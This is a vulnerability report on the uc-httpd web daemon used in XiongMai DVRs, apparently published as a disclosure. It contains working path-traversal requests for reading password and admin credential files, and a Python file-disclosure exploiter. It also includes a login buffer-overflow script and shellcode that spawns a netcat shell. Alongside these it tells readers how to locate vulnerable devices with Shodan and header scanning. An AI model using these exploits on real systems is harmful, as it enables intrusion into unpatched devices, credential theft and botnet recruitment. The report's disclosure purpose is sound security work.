Project Insecurity - insecurity.sh 

Uc-http daemon (DVR) - Vulnerability Report 

 

 
  

 
1.0 - Abstract​: 3 
 
uc-httpd​ by XiongMai Communications is a widely-used DVR software in which we 
identified several vulnerabilities in late 2016 / Early 2017. These included a Local File 
Disclosure vulnerability (which could lead to administrative or root access to the server) 
and also a Buffer Overflow vulnerability. Originally, there were over 3 million devices 
susceptible to these vulnerabilities, but script-kiddies attempted to build a botnet using 
them, which resulted in the number of vulnerable devices dropping to around 500,000. 
This is a good thing, as the company in question has made no effort to perform a patch 
(although this may be due to the fact that they’re literally incapable of doing so for logistical 
reasons rather than technical reasons. More on this in an upcoming blog post regarding 
IoT bugs.) - in this report we will detail the two main vulnerabilities that are present, and 
various ways in which they can be exploited. These devices can be found on shodan.io 
under the ​product:uc-httpd​ search. If mass scanning IPv4 ranges, these devices can be 
found by looking for ‘uc-httpd’ outputted in the HTTP headers. 
 

2​.0
​ - Local File (and path!) Disclosure: 
 
By means of a simple HTTP GET request to the remote server, you can disclose either the 
contents of a specific file, or the contents of files within a directory. This not only allows an 
attacker to read all files on the server, but also allows them to skip the entire trial-and-error 
process, as they can just map out the file contents of the server due to the fact that a GET 
request can be used to display the contents of a directory. Below is an example request 
that would be sent to the server in order to disclose a local file: 

 
2 
  

 
GET ../../../../../etc/passwd HTTP/1.0 

To disclose the contents of a directory, an attacker could send a similar request but 
containing the path to the directory that they want to disclose the contents of, as opposed 
to the path for a file: 

GET ../../../../../var/www/html/ HTTP/1.0 

Although this is Local File Disclosure rather than Local File ​Inclusion​ it is still around as 
severe in terms of impact, as getting access to the remote server is generally as simple as 
reading from a single file. For example, an attacker could read the following file in order to 
obtain administrative credentials to login to the web panel: 

 
GET ../../../../../mnt/mtd/Config/Account1 HTTP/1.0 

The above request would return the username and password for an administrator account 
that can be used for the web-based login panel (this can be running on a variety of ports, 
although most commonly, other than the default port 8
​ 0​, it also runs on the ports 8
​ 1​, ​8000​, 
and 8
​ 001​). Below is an example of what the login panel looks like: 

 
3 
  

In addition to this, on many of these servers you can simply read ​/etc/passwd​ and SSH into 
the server as a user with root access. There is n
​ o encryption​ for the root password stored 
within that file, as seen in the image below: 

The following proof-of-concept script can be used to disclose the contents of any file or 
directory: 

#!/usr/bin/env python 
import urllib2, httplib, sys 
 
httplib.HTTPConnection._http_vsn = 10 
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0' 
 
print "[+] uc-httpd 0day exploiter [+]" 
print "[+] usage: python " + __file__ + " http://<target_ip>" 
 
host = sys.argv[1] 
fd = raw_input('[+] File or Directory: ') 
 
print "Exploiting....." 
print '\n' 
print urllib2.urlopen(host + '/../../../../..' + fd).read() 

Although some files cannot be read without being a root user, the fact that the p
​ asswd​ file 
contains unencrypted root passwords generally makes the inability to read _all_ files a 
non-issue. 

 
4 
  

3​.0
​ - (bonus!) Buffer Overflows: 
 
If the above methods don’t work, then the following Buffer Overflow can be used as a 
means of gaining access instead. The vast majority of these servers have Address Space 
Layout Randomization in place as a security mechanism, but thanks to the LFD vulnerability 
being present, ASLR can be defeated without prior access to the vulnerable server being a 
prerequisite. This can be done by leaked memory addresses which can be read from /​ proc 
entries​.  

Below is a python PoC demonstrating the buffer overflow, which overwrites the stack and 
waits for the kernel watchdog to restart Sofia (to be used in conjunction with the LFD in 
order to bypass ASLR protections): 

import mechanize, time, sys, urllib, socket 

 
from termcolor import colored 
 
print colored('uc-httpd web-daemon bufferoverflow', 'red') 
print colored('- Overwrites the stack (attach to see)', 'red') 
print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red') 
time.sleep(2) 
 
def at_login_overflow(): 
print colored('Sending payload.. ', 'red') 
s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id 
x = mechanize.Browser() 
x.set_handle_robots(False) 
x.set_debug_responses(True) 
x.addheaders = [("User-agent", 
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/41.0.2228.0 Safari/537.36")] 
 
login = x.open(tar_full + s_c) 
x.select_form(nr=0) 
 
x["username"] = buffersm 
x["password"] = "mikevirushackinglimited" 
 
try: 
x.submit() 
except Exception: 
print colored('Target daemon not vulnerable.', 'red') 
pass 
 
check_conn() 
 
 
# Check interface status 
def check_conn(): 
time.sleep(1) 

 
5 
  

print colored('Checking interface status..', 'red') 

 
try: 
urllib.urlopen(tar_full) 
print colored('Exploit failed', 'red') 
except Exception: 
print colored('Finished.', 'red') 
pass 
 
tar = sys.argv[1] 
tar_p = sys.argv[2] 
buff_size = sys.argv[3] 
 
tar_full = "http://" + tar + ":" + tar_p 
 
# rec 180 
buffersm = "\x41" * int(buff_size) 
 
# post only 
at_login_overflow() 
 

Shellcode: 

\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x48\xc1\xef\x08\x57 
\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51 
\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb\x30\x53 
\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37\x49\xc1\xea\x20\x41 
\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89 
\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e\x30\x2e\x30\x2e 
\x31\xec\xf3\x26\x5a\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63 
\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68 
\x48\xc1\xe9\x08\x51\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65 
\x48\xc1\xeb\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37 
\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52 
\x41\x51\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37 
\x2e\x30\x2e\x30\x2e\x31 

4​.0
​ - Remediation: 
 
Sadly, this vulnerability is very hard to remediate as it would require the device 
manufacturers to perform a product recall on all of their devices, due to the fact that the 
firmware itself is half of the issue. They can’t remotely push out a patch for this. Morally 
speaking, mass bricking the devices would be the best option, although doing so would be 
illegal and we most certainly do not condone such actions. 

 
6